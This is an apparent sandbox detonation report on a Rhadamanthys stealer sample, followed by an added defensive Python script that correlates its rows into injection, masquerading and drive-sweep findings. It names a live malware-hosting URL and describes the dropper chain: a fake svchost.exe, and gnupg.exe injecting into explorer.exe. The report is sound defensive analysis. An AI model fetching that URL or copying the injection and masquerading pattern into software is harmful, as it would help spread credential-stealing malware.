Malware Analysis Report

2025-06-15 19:48

Sample ID 240211-kl64haed3t
Target https://www.up-4ever.net/f81xcrmamr72
Tags
rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The submitted URL https://www.up-4ever.net/f81xcrmamr72 was classified as: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-11 08:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-11 08:42

Reported

2024-02-11 08:47

Platform

win10-20231215-en

Max time kernel

294s

Max time network

294s

Command Line

The sandbox opened the submitted URL in Chrome with background networking and component updates disabled; these flags belong to the detonation harness, not to the sample:

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr72

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 4288 created 3084 | N/A | C:\Windows\SysWOW64\explorer.exe | c:\windows\system32\sihost.exe

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\<letter>: for 22 drive letters (A B E G H I J K L M N O P Q R S T U W X Y Z) | C:\Users\Admin\Downloads\your_files\setup\setup.exe | N/A
File opened (read-only) | \??\<letter>: for 23 drive letters (A B E G H I J K L M N O P Q R S T U V W X Y Z) | C:\Windows\SysWOW64\msiexec.exe | N/A
File opened (read-only) | \??\<letter>: for 19 drive letters (A B E G H I J K L N O P Q S T W X Y Z) | C:\Windows\system32\msiexec.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A  (3 identical rows)

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | \??\c:\windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | \??\c:\windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | \??\c:\windows\system32\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | \??\c:\windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | \??\c:\windows\system32\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | \??\c:\windows\system32\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | \??\c:\windows\system32\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | \??\c:\windows\system32\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | \??\c:\windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | \??\c:\windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | \??\c:\windows\system32\svchost.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1604 set thread context of 4288 | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | C:\Windows\SysWOW64\explorer.exe
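Read together, the Executes dropped EXE, Enumerates connected drives, SetThreadContext and NtCreateUserProcessOtherParentProcess tables describe one sequence: a dropped binary under the user's roaming profile (gnupg.exe, PID 1604) rewrites the thread context of a 32-bit explorer.exe (PID 4288), and that explorer.exe then creates process 3084 with a parent other than itself, while setup.exe from Downloads probes nearly every drive letter. The script below is an added example, not part of this report or of the sandbox's own tooling: it transcribes those rows into Python tuples (the drive letters are exactly the ones listed per process above) and applies three correlation rules a detection engineer would want when reading such a report. The eight-letter sweep threshold, the list of Windows system binary names and the set of directories treated as "system" are assumptions of the example.

```python
"""Correlate flattened sandbox signature rows into higher-level findings.

Added example, not the sandbox's own code. REPORT_ROWS is transcribed by hand
from this report's 'Executes dropped EXE', 'Suspicious use of SetThreadContext',
'Suspicious use of NtCreateUserProcessOtherParentProcess' and 'Enumerates
connected drives' tables. Thresholds and name lists are assumptions.
"""
import re
from collections import defaultdict
from typing import NamedTuple, Optional


class Row(NamedTuple):
    signature: str
    description: str
    process: str
    target: Optional[str]


SET_CTX = re.compile(r"PID (\d+) set thread context of (\d+)")
OTHER_PARENT = re.compile(r"PID (\d+) created (\d+)")
DRIVE_PROBE = re.compile(r"^File opened \(read-only\) \\\?\?\\([A-Z]):$")

# Assumed: directories where a binary carrying a Windows system name belongs.
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_BINARY_NAMES = {"svchost.exe", "explorer.exe", "sihost.exe", "msiexec.exe",
                       "dllhost.exe", "rundll32.exe", "conhost.exe"}

GNUPG = r"C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe"
FAKE_SVCHOST = r"C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe"
EXPLORER32 = r"C:\Windows\SysWOW64\explorer.exe"
SETUP = r"C:\Users\Admin\Downloads\your_files\setup\setup.exe"
MSIEXEC32 = r"C:\Windows\SysWOW64\msiexec.exe"
MSIEXEC64 = r"C:\Windows\system32\msiexec.exe"


def _drive_rows(process: str, letters: str) -> list:
    """One 'Enumerates connected drives' row per probed drive letter."""
    return [Row("Enumerates connected drives", f"File opened (read-only) \\??\\{c}:", process, None)
            for c in letters]


# Transcribed from the report; the letter strings are the report's rows per process.
REPORT_ROWS = [
    Row("Executes dropped EXE", "", GNUPG, None),
    Row("Executes dropped EXE", "", FAKE_SVCHOST, None),
    Row("Suspicious use of SetThreadContext", "PID 1604 set thread context of 4288", GNUPG, EXPLORER32),
    Row("Suspicious use of NtCreateUserProcessOtherParentProcess", "PID 4288 created 3084",
        EXPLORER32, r"c:\windows\system32\sihost.exe"),
    *_drive_rows(SETUP, "NUEKPWYABXMTZJSIRHLQGO"),
    *_drive_rows(MSIEXEC32, "MXZPAOVWGRTSYEHLUIJNBKQ"),
    *_drive_rows(MSIEXEC64, "KXJLNHPESZBQTYGAIOW"),
]


def in_system_dir(path: str) -> bool:
    directory, _, _ = path.lower().rpartition("\\")
    return directory in SYSTEM_DIRS


def find_injection_chains(rows):
    """Link 'A set thread context of B' to a later 'B created C' (other-parent) row by PID."""
    created_by = {}  # creator pid -> (created pid, target image from the row)
    for r in rows:
        m = OTHER_PARENT.match(r.description)
        if m and r.signature.endswith("OtherParentProcess"):
            created_by[int(m.group(1))] = (int(m.group(2)), r.target)
    chains = []
    for r in rows:
        m = SET_CTX.match(r.description)
        if not (m and r.signature.endswith("SetThreadContext")):
            continue
        injector_pid, victim_pid = int(m.group(1)), int(m.group(2))
        chain = {
            "injector": r.process, "injector_pid": injector_pid,
            "victim": r.target, "victim_pid": victim_pid,
            # A non-system binary rewriting a system binary's thread context is the
            # hollowing/hijack shape; the same call from a debugger would be benign.
            "injector_outside_system_dirs": not in_system_dir(r.process),
            "victim_is_system_binary": in_system_dir(r.target or ""),
        }
        if victim_pid in created_by:
            chain["victim_then_created_pid"], chain["victim_then_created_target"] = created_by[victim_pid]
        chains.append(chain)
    return chains


def find_masquerading(rows):
    """Executables carrying a Windows system binary name outside the system directories."""
    hits = set()
    for r in rows:
        for path in (r.process, r.target):
            if path and path.lower().rpartition("\\")[2] in SYSTEM_BINARY_NAMES \
                    and not in_system_dir(path):
                hits.add(path)
    return sorted(hits)


def find_drive_sweeps(rows, min_letters: int = 8, ignore_system_dirs: bool = True):
    """Processes that opened at least min_letters distinct drive letters (assumed threshold)."""
    probed = defaultdict(set)
    for r in rows:
        m = DRIVE_PROBE.match(r.description)
        if m:
            probed[r.process].add(m.group(1))
    return {p: "".join(sorted(s)) for p, s in probed.items()
            if len(s) >= min_letters and not (ignore_system_dirs and in_system_dir(p))}


if __name__ == "__main__":
    for chain in find_injection_chains(REPORT_ROWS):
        print("injection chain:", chain)
    print("masquerading:", find_masquerading(REPORT_ROWS))
    print("drive sweeps, non-system processes:", find_drive_sweeps(REPORT_ROWS))
    print("drive sweeps, all processes:", find_drive_sweeps(REPORT_ROWS, ignore_system_dirs=False))
```

Two caveats the rules encode are worth reading off the report directly. The two msiexec.exe instances also sweep the drive letters, but they live in System32/SysWOW64 and are running the MSI that setup.exe unpacked (see the SourceHash and .msi rows under Drops file in Windows directory), so `find_drive_sweeps` suppresses them by default and only reports setup.exe; pass `ignore_system_dirs=False` to see all three. Likewise the DataSharing\Storage files under Drops file in System32 directory are attributed to \??\c:\windows\system32\svchost.exe, the genuine service host, not to the dropped Temp\WasSdrvbcfQkEjM\svchost.exe; `find_masquerading` tells the two apart by directory rather than by file name, and still lets C:\Windows\SysWOW64\explorer.exe through because that is where the 32-bit Explorer legitimately lives.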

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Installer\MSIC881.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSID8B5.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Debug\ESE.TXT | \??\c:\windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\Installer\MSIC98C.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSIC9BC.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSICA79.tmp | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\SourceHash{5DB33E67-8118-4AE0-A414-6B7A0AC6AB7A} | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\e5ac808.msi | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\e5ac804.msi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\e5ac804.msi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSICA3A.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSICB17.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSID74D.tmp | C:\Windows\system32\msiexec.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133521145605244619" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A  (4 identical rows)
N/A | N/A | C:\Windows\system32\mspaint.exe | N/A  (4 identical rows)
N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A  (32 identical rows)
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A  (4 identical rows)
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A  (2 identical rows)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A  (4 identical rows)
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A  (2 identical rows)
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A  (4 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A  (32 identical rows)
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A  (32 identical rows)

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A  (35 identical rows)
N/A | N/A | C:\Users\Admin\Downloads\your_files\setup\setup.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A  (2 identical rows)

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A  (24 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 204 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 3000 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr72

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff86f979758,0x7ff86f979768,0x7ff86f979778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2864 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2036 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

c:\windows\system32\sihost.exe

sihost.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4640 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4844 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5356 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5836 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3796 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=768 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2904 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DsSvc

C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe

"C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca

C:\Users\Admin\Downloads\your_files\setup\setup.exe

"C:\Users\Admin\Downloads\your_files\setup\setup.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding DC89B66988FA4B04CEC0520C89FCD9D3 C

C:\Windows\SysWOW64\msiexec.exe

